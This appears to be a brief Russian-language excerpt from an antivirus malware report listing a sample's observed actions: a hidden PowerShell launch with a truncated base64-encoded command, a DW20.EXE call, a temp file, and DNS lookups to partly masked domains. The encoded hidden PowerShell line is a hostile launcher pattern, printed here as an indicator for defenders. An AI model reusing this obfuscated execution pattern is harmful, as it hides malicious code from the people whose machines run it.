Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABRAGsAegB2AHEAawB3AGcAagBtAHIAdgBtAD0AJwBNAHoAYgBmAGEAYgBuAGgAJwA7ACQAQwBjAGoAeQBoAGUAdQB0AGMAdgBlAHQAZAAgAD0AIAAnADcAMwA1ACcAOwAkAEwAaABsAGMAdQByAGEAZgB3AGs...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1500
- %TEMP%\812578.cvr
- 'ke###ops.com':80
- DNS ASK ke###ops.com
- DNS ASK pu###itech.com
- DNS ASK in####rmetric.com
- DNS ASK sh####ocaviar.com
- DNS ASK ph####chemsales.com